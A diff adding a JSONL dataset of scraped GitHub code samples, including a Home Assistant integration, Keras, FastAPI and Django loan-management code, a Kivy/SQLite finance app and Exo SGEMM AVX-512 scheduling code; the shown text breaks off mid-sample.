diff --git "a/5459.jsonl" "b/5459.jsonl" new file mode 100644--- /dev/null +++ "b/5459.jsonl" @@ -0,0 +1,2198 @@ +{"seq_id":"309402499","text":"\"\"\"Example Load Platform integration.\"\"\"\nfrom __future__ import annotations\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.typing import ConfigType\n\nDOMAIN = 'example_load_platform'\n\n\ndef setup(hass: HomeAssistant, config: ConfigType) -> bool:\n \"\"\"Your controller/hub specific code.\"\"\"\n # Data that you want to share with your platforms\n hass.data[DOMAIN] = {\n 'temperature': 23\n }\n\n hass.helpers.discovery.load_platform('sensor', DOMAIN, {}, config)\n\n return True\n","repo_name":"home-assistant/example-custom-config","sub_path":"custom_components/example_load_platform/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"53"} +{"seq_id":"36851710182","text":"from pydantic import BaseModel\nfrom typing import Optional\n\n\nclass SearchRequest(BaseModel):\n \"\"\"\n \"\"\"\n\n name: str\n new_model: str\n limit: Optional[int] = 10\n round: Optional[int] = 2\n percent: Optional[float] = 50\n type: Optional[str] = \"database\"\n\n class Config:\n schema_extra = {\n \"example\": {\n \"name\": \"EquipmentModel\",\n \"new_model\": \"СКАТ-2400\",\n \"limit\": 10,\n \"round\": 2,\n \"percent\": 50,\n \"type\": \"database\"\n }\n }","repo_name":"oilgo/fuzzy_search","sub_path":"apps/search/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29391229109","text":"import numpy as np\nfrom keras import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers import Conv2D, MaxPool2D, Flatten\nfrom keras.optimizers import SGD, Adam\nfrom keras.utils import np_utils\nfrom keras.models import load_model\nimport sys, csv, time\nfrom hw8_train import normalization, MobileNet\n\n# import tensorflow as tf\n# config = tf.ConfigProto()\n# config.gpu_options.allow_growth = True\n# sess = tf.Session(config = config)\n\nstart = time.time()\n\ndef load_data(input) :\n x_test = []\n data = csv.reader(open(input))\n num = 0\n for row in data :\n if num == 0 :\n num += 1\n continue\n else :\n flat_array = np.array(row[1].split(' '), dtype = float)\n #tmp = np.reshape(flat_array, (48, 48, 1))\n #tmp = np.concatenate((tmp, tmp, tmp), axis=2)\n x_test.append(flat_array)\n \n x_test = np.array(x_test)\n x_test = normalization(x_test)\n x_test = np.reshape(x_test, (-1, 48, 48, 1))\n return x_test\n\ndef test(x_test, modelfile) :\n model = MobileNet(include_top=False, weights=None, input_shape=(48, 48, 1), alpha=1, classes=7, pooling='avg')\n model.summary()\n model.load_weights(modelfile)\n\n x_valid, y_valid = np.load('x_valid.npy'), np.load('y_valid.npy') \n score = model.evaluate(x_valid, y_valid)\n print ('Total loss on validation data :', score[0])\n print ('Accuracy of validation data :', score[1])\n \n result = model.predict(x_test)\n result = np.argmax(result, axis=1)\n return result\n\ndef write(filename, data) :\n outfile = open(filename, 'w')\n writer = csv.writer(outfile)\n writer.writerow(['id', 'label'])\n for i in range(data.shape[0]) :\n id = i\n label = data[i]\n writer.writerow([id, label])\n outfile.close()\n\nif __name__ == \"__main__\":\n modelfile = './weightsfile.h5'\n x_test = load_data(sys.argv[1])\n #x_test = 
normalization(x_test)\n result = test(x_test, modelfile)\n write(sys.argv[2], result)\n\nend = time.time()\nt = end - start\nprint('')\nprint(\"Time taken: \", t, \"seconds.\")","repo_name":"adamlin09/ML2019SPRING","sub_path":"hw8/hw8_test.py","file_name":"hw8_test.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74019682727","text":"#pg 27 Problem 9\n\nnum1 = float(input(\"Please enter the first number: \"))\nnum2 = float(input(\"Please enter the second number: \"))\nprint(round(num1 * num2, 2))\nprint(round(num1 + num2, 2))\n\n\n#pg 27 Problem 10\nnum = 1\nsum1 = 0\ncount = 0\nwhile num != 0:\n sum = int(input(\"Please enter in a number: \"))\n sum1 += sum\n count = count + 1\n yn = int(input(\"Would you like to enter in another number to add? If no enter 0, if yes enter 1: \"))\n if yn == 1: num = num\n else: num = num - 1\nprint(\"The average of these numbers are\", sum1/count)\n","repo_name":"Goodnews888/DITP-2021","sub_path":"Loops/12_loop_challenges.py","file_name":"12_loop_challenges.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39251044814","text":"import random\n\nfrom PIL import Image\n\n\ndef tarnslate_photo_on_treatment(photo):\n img = Image.open(photo)\n im = Image.new('RGB', (img.size[0], 300), (255, 255, 255))\n\n bwidth, bheight = img.size[0], img.size[1]\n fwidth, fheight = im.size[0], im.size[1]\n x, y = 0, bheight - fheight # в левый нижний\n img.paste(im, (x, y))\n\n img.save(f'/Users/macbookpro/Documents/PhotoOptimazerPy/PHOTO/TREATMENT/photo_{random.randint(0, 9999)}.jpg')\n\n","repo_name":"TshalabaevCaspianLabs/PhotoOptimazerPy","sub_path":"PHOTO/DELETE_WATEMARK.py","file_name":"DELETE_WATEMARK.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12159713189","text":"\"\"\"Application module.\"\"\"\nfrom fastapi import FastAPI\nfrom .containers import Container\nfrom .routers import main_router\nfrom fastapi.middleware.cors import CORSMiddleware\n\napp = FastAPI()\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['http://localhost:4000'],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"Content-Type\", \"Set-Cookie\"]\n)\napp.include_router(main_router)\n\ncontainer = Container()\ncontainer.config.redis_host.from_env(\"REDIS_HOST\", \"localhost\")\ncontainer.config.redis_password.from_env(\"REDIS_PASSWORD\", \"password\")\ncontainer.wire(packages=[\n '.endpoints',\n '.utils'\n])\n","repo_name":"Semolik/ASUtimetable","sub_path":"api/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36422273138","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 8 14:39:19 2019\n\n@author: ameya\n\"\"\"\n\nimport sqlite3\nimport datetime\nimport kivy\nkivy.require(\"1.10.1\")\nfrom kivy.app import App\nfrom kivy.uix.screenmanager import Screen, ScreenManager\nfrom kivy.lang.builder import Builder\nfrom kivy.properties import ObjectProperty, ListProperty, BooleanProperty\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.listview import ListView\nfrom kivy.uix.recycleview import RecycleView\nfrom kivy.uix.recycleboxlayout import RecycleBoxLayout\nfrom kivy.uix.recyclegridlayout import 
RecycleGridLayout\nfrom kivy.uix.recycleview.views import RecycleDataViewBehavior\nfrom kivy.uix.label import Label\n\nconn = sqlite3.connect('Amity Ramapriya Finances.db')\nc = conn.cursor()\nnow = datetime.datetime.now()\nBuilder.load_file(\"ARAFin.kv\")\n# DATABASE STORAGE AND MANIPULATION FUNCTIONS FOR RESIDENTS\ndef create_table_accounts():\n with conn:\n c.execute(\"\"\"CREATE TABLE Accounts (\n Name TEXT,\n PhoneNo INTEGER,\n BlockNo TEXT,\n FlatNo INTEGER ,\n Balance REAL,\n Initialisation_Date TEXT,\n Transactions TEXT\n )\"\"\")\n\ndef create_table_transactions():\n with conn:\n c.execute(\"\"\"CREATE TABLE Transactions(\n T_ID INT PRIMARY KEY AUTO_INCREMENT,\n From INTEGER,\n To INTEGER,\n Amount REAL,\n Transaction_Date TEXT,\n Mode TEXT\n )\"\"\")\ndef add_new_res(details):\n with conn:\n c.execute(\"INSERT INTO Accounts VALUES (:Name, :PhoneNo, :BlockNo, :FlatNo, :Balance, :Initialisation_Date, :Transactions)\", details)\n\ndef update_res(details):\n with conn:\n c.execute(\"\"\"UPDATE Accounts\n SET Name = ?, PhoneNo = ?, BlockNo = ?, Balance = ?\n WHERE FlatNo = ?\"\"\", (details['Name'], details['PhoneNo'], details['BlockNo'], details['Balance'], details['FlatNo']))\ndef view_res():\n with conn:\n c.execute(\"SELECT Name, PhoneNo, BlockNo, FlatNo, Balance FROM Accounts\")\n rows = c.fetchall()\n print(rows)\n return rows\n \ndef delete_res(flatNo):\n with conn:\n c.execute(\"\"\"DELETE FROM Accounts WHERE FlatNo = ?\"\"\", (flatNo,))\n# END OF DATABASE STORAGE AND MANIPULATION FUNCTIONS FOR RESIDENTS\n\n#HOME SCREEN DEFINITION\nclass HomeScreen(Screen):\n pass\n#Failed user register popup\nclass FailRegisterPopup(Popup):\n pass\n\nclass SuccessRegisterPopup(Popup):\n pass\n\n#ADD RESIDENT DEFINITION\nclass AddResidentScreen(Screen):\n nameRes = ObjectProperty()\n phoneNo = ObjectProperty()\n blockNo = ObjectProperty()\n flatNo = ObjectProperty()\n balance = ObjectProperty()\n errorname = ObjectProperty()\n errorphno = ObjectProperty()\n errorblockno = ObjectProperty()\n errorflatno = ObjectProperty()\n errorbalance = ObjectProperty()\n \n def reset_errors(self):\n self.errorname.text = \"\"\n self.errorphno.text = \"\"\n self.errorblockno.text = \"\"\n self.errorflatno.text = \"\"\n self.errorbalance.text = \"\"\n def reset_text_input(self):\n self.nameRes.text = \"\"\n self.phoneNo.text = \"\"\n self.blockNo.text = \"\"\n self.flatNo.text = \"\"\n self.balance.text = \"\" \n def validate_input(self, details):\n validate_dict = {'Name': True, 'PhoneNo': True, 'FlatNo': True, 'Balance': True, 'BlockNo': True}\n valid_blocks = ['A', 'B', 'C']\n if len(details['Name']) == 0:\n validate_dict['Name'] = False\n if str(details['PhoneNo']).isdigit() == False:\n validate_dict['PhoneNo'] = False\n elif len(str(details['PhoneNo'])) != 10:\n validate_dict['PhoneNo'] = False\n if details['BlockNo'].upper() not in valid_blocks:\n validate_dict['BlockNo'] = False\n fno = str(details['FlatNo'])\n if len(fno) != 3:\n validate_dict['FlatNo'] = False\n elif fno.isdigit() == False:\n validate_dict['FlatNo'] = False\n elif int(fno[0]) > 4 or int(fno[0]) < 0:\n validate_dict['FlatNo'] = False\n elif int(fno[1:3]) > 12 or int(fno[1:3]) < 0:\n validate_dict['FlatNo'] = False\n if details['Balance'] == \"\":\n validate_dict['Balance'] = False\n elif details['Balance'].isdigit() == False:\n validate_dict['Balance'] = False\n elif float(details['Balance']) < 0:\n validate_dict['Balance'] = False\n return validate_dict\n \n def submit(self):\n all_ok = True\n self.reset_errors()\n details = {}\n 
details['Name'] = self.nameRes.text.rstrip()\n details['PhoneNo'] = self.phoneNo.text.rstrip()\n details['BlockNo'] = self.blockNo.text.rstrip()\n details['FlatNo'] = self.flatNo.text.rstrip()\n details['Balance'] = self.balance.text.rstrip()\n details['Initialisation_Date'] = now.strftime(\"%d-%m-%Y\")\n details['Transactions'] = \"\"\n validated = self.validate_input(details)\n if not validated['Name']:\n self.errorname.text = \"Please Enter Correct Name\"\n all_ok = False\n if not validated['PhoneNo']:\n self.errorphno.text = \"Enter a valid Phone Number\"\n all_ok = False\n if not validated['BlockNo']:\n self.errorblockno.text = \"Enter Valid Block\"\n all_ok = False\n if not validated['FlatNo']:\n self.errorflatno.text = \"Enter Valid Flat no\"\n all_ok = False\n if not validated['Balance']:\n self.errorbalance.text = \"Enter valid Balance\"\n all_ok = False\n if all_ok:\n details['FlatNo'] = int(details['FlatNo'])\n details['Balance'] = float(details['Balance'])\n details['PhoneNo'] = int(details['PhoneNo'])\n c.execute(\"SELECT *FROM Accounts WHERE FlatNo = ?\",(details['FlatNo'],))\n rows = c.fetchall()\n if len(rows) == 1:\n print(\"Resident Details already exists\")\n popupmsg = FailRegisterPopup()\n popupmsg.open()\n \n else:\n add_new_res(details)\n successpopup = SuccessRegisterPopup()\n successpopup.open()\n self.reset_text_input()\n self.reset_errors()\n print(\"Resident added\")\n #root.manager.current = \"Home\"\n#DATATTYPES OF BALANCE AND FLAT NO HAVE TO BE CHANGED\nclass SelectableLabel(Label):\n ''' Add selection support to the Label '''\n pass\n \nclass ViewRegisteredResidentsScreen(Screen):\n data_items = ListProperty([])\n def __init__(self, **kwargs):\n super(ViewRegisteredResidentsScreen, self).__init__(**kwargs)\n self.loaddataintolist()\n def loaddataintolist(self):\n rows = view_res()\n for row in rows:\n for col in row:\n self.data_items.append(col)\n \n \n \nclass Screen_Manager(ScreenManager):\n pass\napp = Screen_Manager()\napp.add_widget(HomeScreen())\napp.add_widget(AddResidentScreen())\n#app.add_widget(ViewRegisteredResidentsScreen(name = \"viewres\"))\nclass ARAFinaApp(App):\n def build(self):\n return app\n \nif __name__ == '__main__':\n Finances = ARAFinaApp()\n Finances.run()","repo_name":"ameyaditya/financeswebapp","sub_path":"amity ramapriya finances Desktop App/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35670684409","text":"from collections import deque\nt = int(input())\nfor i in range(t):\n c = 0\n n, k = map(int, input().split())\n l = list(map(int, input().split()))\n x = deque()\n y = deque()\n for j in range(n):\n x.append(l[j])\n y.append(j)\n while True:\n if x[0] == max(list(x)):\n x.popleft()\n d = y.popleft()\n c += 1\n if d == k:\n print(c)\n break\n continue\n else:\n x.append(x.popleft())\n y.append(y.popleft())\n\n","repo_name":"jjun-ni/jjun-ni","sub_path":"venv/구현/1966.py","file_name":"1966.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13642570306","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy, reverse\nfrom django.views.generic import UpdateView, CreateView, DeleteView\nfrom datetime import datetime\nimport calendar\nfrom decimal import Decimal\nfrom debts.models import (\n CustomerItemLoan, CustomerMoneyLoan, ItemBorrowed, \n 
MoneyLoanPayment, ItemLoanPayment, LoanApplication\n)\nfrom core.models import Inventory\n\nfrom .forms import MoneyLoanPaymentForm, LoanApplicationForm, ItemBorrowedForm\nfrom users.models import Customer\n\ndate_today = datetime.now().date()\n\n# Create your views here.\ndef loans(request):\n return render(request, \"loans/loans.html\")\n\n\ndef loan_applications(request):\n loan_applications = LoanApplication.objects.all().order_by(\"-created\")\n context = {\n \"loan_applications\": loan_applications\n }\n return render(request, \"loans/loan_applications.html\", context)\n\n\ndef resubmit_loan_application(request, pk):\n loan_application = LoanApplication.objects.get(id=pk)\n loan_application.status = \"Pending\"\n loan_application.save()\n return redirect(\"loan-applications\")\n\n\ndef approve_loan_application(request, pk):\n loan_application = LoanApplication.objects.get(id=pk)\n loan_application.status = \"Approved\"\n loan_application.save()\n return redirect(\"loan-applications\")\n\n\ndef disburse_loan_application(request, pk):\n loan_application = LoanApplication.objects.get(id=pk)\n\n if request.method == \"POST\":\n amount_awarded = Decimal(request.POST.get(\"amount_awarded\"))\n customer = loan_application.customer\n interest_percent = Decimal(request.POST.get(\"interest\"))\n\n interest_accrued = (interest_percent / 100) * amount_awarded\n date_awarded = request.POST.get(\"date_awarded\")\n expected_repay_date = request.POST.get(\"expected_repay_date\")\n\n loan = CustomerMoneyLoan(\n customer=customer,\n amount_awarded=amount_awarded,\n interest_accrued=interest_accrued,\n date_awarded=date_awarded,\n expected_repay_date=expected_repay_date,\n status=\"Paying\",\n amount_repaid=0\n )\n loan.save()\n\n loan_application.disburse = True\n loan_application.save()\n\n return redirect(reverse(\"money-loan-detail\", kwargs={\"loan_id\": loan.id}))\n \n context = {\n \"loan_application\": loan_application\n }\n\n return render(request, \"loans/disburse_loan.html\", context)\n\n\nclass LoanApplyView(CreateView):\n model = LoanApplication\n form_class = LoanApplicationForm\n template_name = \"loans/apply_loan.html\"\n \n\ndef decline_loan_application(request, pk):\n loan_application = LoanApplication.objects.get(id=pk)\n loan_application.status = \"Declined\"\n loan_application.save()\n return redirect(\"loan-applications\")\n\n\ndef customer_item_loans(request, customer_id=None):\n item_loans = CustomerItemLoan.objects.all().order_by(\"-created\")\n\n if customer_id:\n item_loans = CustomerItemLoan.objects.filter(customer__id=customer_id).order_by(\"-created\")\n\n context = {\n \"item_loans\": item_loans\n }\n return render(request, \"loans/item_loans.html\", context)\n\n\ndef item_loan_payments(request, loan_id=None):\n items_loan_payments = ItemLoanPayment.objects.all().order_by(\"-created\")\n\n customer_id = None\n\n if loan_id:\n items_loan_payments = ItemLoanPayment.objects.filter(loan__id=loan_id).order_by(\"-created\")\n\n loan = CustomerItemLoan.objects.get(id=loan_id)\n customer_id = loan.customer.id\n\n\n context = {\n \"loan_payments\": items_loan_payments,\n \"loan_id\": loan_id,\n \"customer_id\": customer_id\n }\n return render(request, \"loans/items_loan_payments.html\", context)\n\n\ndef customer_item_loan_detail(request, loan_id=None):\n loan = CustomerItemLoan.objects.get(id=loan_id)\n\n if loan_id:\n item_loan_payments = ItemLoanPayment.objects.filter(loan__id=loan_id).order_by(\"-created\")\n borrowed_items = 
ItemBorrowed.objects.filter(customer=loan.customer)\n\n context = {\n \"loan\": loan,\n \"loan_payments\": item_loan_payments,\n \"borrowed_items\": borrowed_items\n }\n return render(request, \"loans/item_loan.html\", context)\n\n\n\ndef pay_item_loan(request, customer_id=None, loan_id=None):\n customer = Customer.objects.get(id=customer_id)\n loan = CustomerItemLoan.objects.get(id=loan_id)\n\n name = f\"{customer.first_name} {customer.last_name}\"\n \n if request.method == \"POST\":\n amount = request.POST.get(\"amount\")\n payment = ItemLoanPayment(loan=loan, customer=customer, amount=amount)\n payment.save()\n\n loan.amount_repaid += Decimal(amount)\n loan.save()\n\n return redirect(reverse(\"item-loan-detail\", kwargs={\"loan_id\": loan_id}))\n \n context = {\n \"name\": name,\n \"loan\": loan\n }\n\n \n return render(request, \"loans/payments/pay_item_loan.html\", context)\n\n\ndef new_item_loan(request, customer_id=None):\n try:\n customer = Customer.objects.get(id=customer_id)\n loan = CustomerItemLoan(\n customer=customer,\n amount_borrowed=0,\n amount_repaid=0\n )\n loan.save()\n return redirect(reverse(\"customer-detail\", kwargs={\"pk\": customer_id}))\n except Exception as e:\n raise e\n\ndef new_loan_item(request, loan_id=None, customer_id=None):\n form = ItemBorrowedForm(request.POST or None)\n try:\n customer = Customer.objects.get(id=customer_id)\n loan = CustomerItemLoan.objects.get(id=loan_id)\n\n if request.method == \"POST\":\n item_id = int(request.POST.get(\"item\"))\n quantity = Decimal(request.POST.get(\"quantity\"))\n\n year = str(date_today.year)\n month = calendar.month_name[date_today.month]\n\n item = Inventory.objects.get(id=item_id)\n\n\n print(f\"Item: {item.name}, Quantity: {quantity}\")\n\n borrowed_item = ItemBorrowed(\n customer=customer,\n item=item,\n quantity=quantity,\n year=year,\n month=month\n )\n\n borrowed_item.save()\n borrowed_amount = item.unit_price * quantity\n\n loan.amount_borrowed += borrowed_amount\n loan.save()\n\n item.stock -= quantity\n item.save()\n \n return redirect(reverse(\"item-loan-detail\", kwargs={\"loan_id\": loan_id}))\n\n except Exception as e:\n raise e\n\n return render(request, \"loans/item_loans/loan_item.html\", {\"form\": form})\n\ndef borrowed_items(request):\n borrowed_items = ItemBorrowed.objects.all().order_by(\"-created\")\n context = {\n \"borrowed_items\": borrowed_items\n }\n return render(request, \"loans/borrowed_items.html\", context)\n\n\ndef customer_money_loans(request, customer_id=None):\n money_loans = CustomerMoneyLoan.objects.all().order_by(\"-created\")\n\n if customer_id:\n money_loans = CustomerMoneyLoan.objects.filter(customer__id=customer_id).order_by(\"-created\")\n\n context = {\n \"money_loans\": money_loans\n }\n return render(request, \"loans/money_loans.html\", context)\n\n\ndef customer_money_loan_detail(request, loan_id=None):\n loan = CustomerMoneyLoan.objects.get(id=loan_id)\n\n if loan_id:\n money_loan_payments = MoneyLoanPayment.objects.filter(loan__id=loan_id).order_by(\"-created\")\n\n context = {\n \"loan\": loan,\n \"loan_payments\": money_loan_payments\n }\n return render(request, \"loans/money_loan.html\", context)\n\n\n\ndef money_loan_payments(request, loan_id=None):\n money_loan_payments = MoneyLoanPayment.objects.all().order_by(\"-created\")\n\n customer_id = None\n\n if loan_id:\n money_loan_payments = MoneyLoanPayment.objects.filter(loan__id=loan_id).order_by(\"-created\")\n\n loan = CustomerMoneyLoan.objects.get(id=loan_id)\n customer_id = loan.customer.id\n\n\n 
context = {\n \"loan_payments\": money_loan_payments,\n \"loan_id\": loan_id,\n \"customer_id\": customer_id\n }\n return render(request, \"loans/money_loan_payments.html\", context)\n\n\ndef pay_money_loan(request, customer_id=None, loan_id=None):\n\n customer = Customer.objects.get(id=customer_id)\n loan = CustomerMoneyLoan.objects.get(id=loan_id)\n\n name = f\"{customer.first_name} {customer.last_name}\"\n \n if request.method == \"POST\":\n amount = request.POST.get(\"amount\")\n payment = MoneyLoanPayment(loan=loan, customer=customer, amount=amount)\n payment.save()\n\n loan.amount_repaid += Decimal(amount)\n loan.save()\n\n return redirect(reverse(\"money-loan-detail\", kwargs={\"loan_id\": loan_id}))\n \n\n context = {\n \"name\": name,\n \"loan\": loan\n }\n\n \n return render(request, \"loans/payments/pay_money_loan.html\", context)","repo_name":"Paulndambo/Debt-Management-App","sub_path":"debts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72428582887","text":"from __future__ import annotations\n\nfrom exo import *\nfrom exo.libs.memories import DRAM_STATIC\nfrom exo.platforms.x86 import *\nfrom exo.syntax import *\nfrom exo.stdlib.scheduling import *\n\n\ndef reorder_up(p, stmt_pattern, n=1):\n for _ in range(n):\n c = p.find(stmt_pattern).expand(1, 0)\n p = reorder_stmts(p, c)\n return p\n\n\ndef fuse_after(p, stmt):\n c = p.find_loop(stmt)\n c2 = c.next()\n return fuse(p, c, c2)\n\n\n# noinspection PyPep8Naming\n@proc\ndef SGEMM(M: size, N: size, K: size, A: f32[M, K], B: f32[K, N], C: f32[M, N]):\n assert M >= 1\n assert N >= 1\n assert K >= 1\n assert stride(A, 1) == 1\n assert stride(B, 1) == 1\n assert stride(C, 1) == 1\n\n for k in seq(0, K):\n for i in seq(0, M):\n for j in seq(0, N):\n C[i, j] += A[i, k] * B[k, j]\n\n\ndef make_win(p):\n p = rename(p, \"SGEMM_WINDOW\")\n p = set_window(p, \"A\", True)\n p = set_window(p, \"B\", True)\n p = set_window(p, \"C\", True)\n return p\n\n\nSGEMM_WINDOW = make_win(SGEMM)\n\n# Constants for scheduling\nVEC_W = 16\n\nM_REG_BLK = 6\nN_REG_BLK = 4 * VEC_W\n\nM_L1_FAC = 44\nN_L1_FAC = 1\n\nM_L1_BLK = M_REG_BLK * M_L1_FAC\nN_L1_BLK = N_REG_BLK * N_L1_FAC\nK_L1_BLK = 512\n\nCOPY_STREAMS = 3\n\nbasic_kernel_Mx4 = {}\nsgemm_kernel_avx512_Mx4 = {}\nfor M in range(1, M_REG_BLK + 1):\n\n def make_basic(p):\n p = rename(p, f\"basic_kernel_{M}x4\")\n p = p.partial_eval(M, N_REG_BLK)\n p = simplify(p)\n return p\n\n basic_kernel_Mx4[M] = make_basic(SGEMM_WINDOW)\n # (\n # SGEMM_WINDOW\n # .rename(f'basic_kernel_{M}x4')\n # .partial_eval(M, N_REG_BLK)\n # .simplify()\n # )\n def make_avx512_kernel(p):\n p = rename(p, f\"sgemm_kernel_avx512_{M}x4\")\n # Vectorize columns\n p = divide_loop(p, \"j\", VEC_W, [\"jo\", \"ji\"], perfect=True)\n # Stage C for reduction\n p = stage_mem(p, \"C[_] += _\", f\"C[i, {VEC_W} * jo + ji]\", \"C_reg\")\n p = set_memory(p, \"C_reg\", AVX512)\n p = autolift_alloc(p, \"C_reg: _\", n_lifts=3, keep_dims=True)\n p = autolift_alloc(p, \"C_reg: _\")\n p = autofission(p, p.find(\"C_reg[_] = _\").after(), n_lifts=4)\n p = autofission(p, p.find(\"C[_] = _\").before(), n_lifts=4)\n # Stage A & B\n def stage_input(p, expr, new_buf):\n p = bind_expr(p, expr, new_buf)\n p = expand_dim(p, new_buf, 16, \"ji\")\n p = lift_alloc(p, new_buf)\n p = set_memory(p, new_buf, AVX512)\n p = fission(p, p.find(f\"{new_buf} = _\").after())\n return p\n\n p = stage_input(p, \"A[_]\", \"A_vec\")\n p = 
stage_input(p, \"B[_]\", \"B_vec\")\n # Schedule ops\n p = replace(p, \"for ji in _: _ #0\", mm512_loadu_ps)\n p = replace(p, \"for ji in _: _ #3\", mm512_storeu_ps)\n p = replace_all(p, mm512_set1_ps)\n p = replace_all(p, mm512_loadu_ps)\n p = replace_all(p, mm512_fmadd_ps)\n # LICM\n p = autolift_alloc(p, \"A_vec: _\", keep_dims=True)\n p = autofission(p, p.find(\"mm512_set1_ps(_)\").after())\n # Clean up\n p = simplify(p)\n print(p)\n return p\n\n sgemm_kernel_avx512_Mx4[M] = make_avx512_kernel(basic_kernel_Mx4[M])\n\n\ndef make_bottom_panel_kernel(p):\n p = rename(p, \"bottom_panel_kernel\")\n p = p.partial_eval(N=N_REG_BLK)\n p = p.add_assertion(\"M < 6\")\n p = simplify(p)\n return p\n\n\nbottom_panel_kernel = make_bottom_panel_kernel(SGEMM_WINDOW)\n\n\ndef make_bottom_panel_kernel_scheduled(p=bottom_panel_kernel):\n p = rename(p, \"bottom_panel_kernel_scheduled\")\n p = specialize(p, \"for k in _: _ #0\", [f\"M == {i}\" for i in range(1, M_REG_BLK)])\n p = simplify(p)\n for M in range(1, 6):\n p = replace_all(p, basic_kernel_Mx4[M])\n p = call_eqv(p, f\"basic_kernel_{M}x4(_)\", sgemm_kernel_avx512_Mx4[M])\n p = simplify(p)\n return p\n\n\nbottom_panel_kernel_scheduled = make_bottom_panel_kernel_scheduled()\n\n\ndef make_right_panel_kernel(p=SGEMM_WINDOW):\n p = rename(p, \"right_panel_kernel\")\n p = p.partial_eval(M=M_REG_BLK)\n p = p.add_assertion(\"N / 16 < 4\")\n p = simplify(p)\n return p\n\n\nright_panel_kernel = make_right_panel_kernel()\n\n\ndef make_right_panel_kernel_opt(p=right_panel_kernel):\n p = rename(p, \"right_panel_kernel_opt\")\n #\n p = stage_mem(p, \"C[_] += _\", \"C[i, j]\", \"C_reg\")\n p = divide_loop(p, \"j\", VEC_W, [\"jo\", \"ji\"], tail=\"cut\")\n p = bound_and_guard(p, \"for ji in _: _ #1\")\n p = fission(p, p.find(\"for jo in _: _\").after(), n_lifts=2)\n #\n p = autolift_alloc(p, \"C_reg: _\", n_lifts=3, keep_dims=True)\n p = autolift_alloc(p, \"C_reg: _ #1\", n_lifts=3, keep_dims=True)\n p = autolift_alloc(p, \"C_reg: _\")\n p = autolift_alloc(p, \"C_reg: _ #1\")\n p = reorder_up(p, \"C_reg : _ #1\")\n # p = reorder_stmts(p, 'for k in _ : _\\n'\n # 'C_reg: _')\n #\n p = autofission(p, p.find(\"C_reg[_] = _ #0\").after(), n_lifts=4)\n p = autofission(p, p.find(\"C_reg[_] = _ #1\").after(), n_lifts=4)\n p = autofission(p, p.find(\"C_reg[_] += _ #0\").after(), n_lifts=4)\n p = autofission(p, p.find(\"C_reg[_] += _ #1\").after(), n_lifts=4)\n #\n p = reorder_up(p, \"for i in _: _ #3\")\n p = reorder_up(p, \"for i in _: _ #2\")\n p = reorder_up(p, \"for k in _: _ #1\")\n #\n p = set_memory(p, \"C_reg\", AVX512)\n p = set_memory(p, \"C_reg #1\", AVX512)\n #\n def stage_input(p, expr, new_buf, n_lifts=1):\n p = bind_expr(p, expr, new_buf)\n p = expand_dim(p, new_buf, 16, \"ji\", unsafe_disable_checks=True)\n p = lift_alloc(p, new_buf, n_lifts=n_lifts)\n p = set_memory(p, new_buf, AVX512)\n p = fission(p, p.find(f\"{new_buf} = _\").after(), n_lifts=n_lifts)\n return p\n\n p = stage_input(p, \"A[_]\", \"A_reg\")\n p = stage_input(p, \"B[_]\", \"B_reg\")\n #\n p = replace_all(p, mm512_set1_ps)\n p = replace_all(p, mm512_fmadd_ps)\n p = replace(p, \"for ji in _:\\n\" \" C[_] = _\", mm512_storeu_ps)\n p = replace_all(p, mm512_loadu_ps)\n #\n p = replace(p, \"for ji in _: _ #0\", mm512_maskz_loadu_ps)\n p = replace(p, \"for ji in _: _ #1\", mm512_mask_storeu_ps)\n #\n p = stage_input(p, \"A[_] #1\", \"A_reg2\", n_lifts=2)\n p = stage_input(p, \"B[_] #1\", \"B_reg2\", n_lifts=2)\n #\n p = replace_all(p, mm512_mask_set1_ps)\n p = replace_all(p, 
mm512_mask_fmadd_ps)\n p = replace_all(p, mm512_maskz_loadu_ps)\n #\n for tgt in [\"i #0\", \"k #0\", \"i #1\", \"i #2\"]:\n p = fuse_after(p, tgt)\n #\n p = simplify(p)\n return p\n\n\nright_panel_kernel_opt = make_right_panel_kernel_opt()\n\n\ndef make_right_panel_kernel_scheduled(p=right_panel_kernel):\n p = rename(p, \"right_panel_kernel_scheduled\")\n p = replace_all(p, right_panel_kernel)\n #\n p = specialize(\n p,\n \"right_panel_kernel(_)\",\n [f\"(N / 16) == {i}\" for i in range(N_REG_BLK // VEC_W)],\n )\n #\n p = repeat(call_eqv)(p, \"right_panel_kernel(_)\", right_panel_kernel_opt)\n p = repeat(inline)(p, \"right_panel_kernel_opt\")\n #\n p = repeat(inline_window)(p, \"A = _\")\n p = repeat(inline_window)(p, \"B = _\")\n p = repeat(inline_window)(p, \"C = _\")\n #\n p = simplify(p)\n return p\n\n\nright_panel_kernel_scheduled = make_right_panel_kernel_scheduled()\n\n\ndef make_sgemm_above_kernel(p=SGEMM_WINDOW):\n p = rename(p, 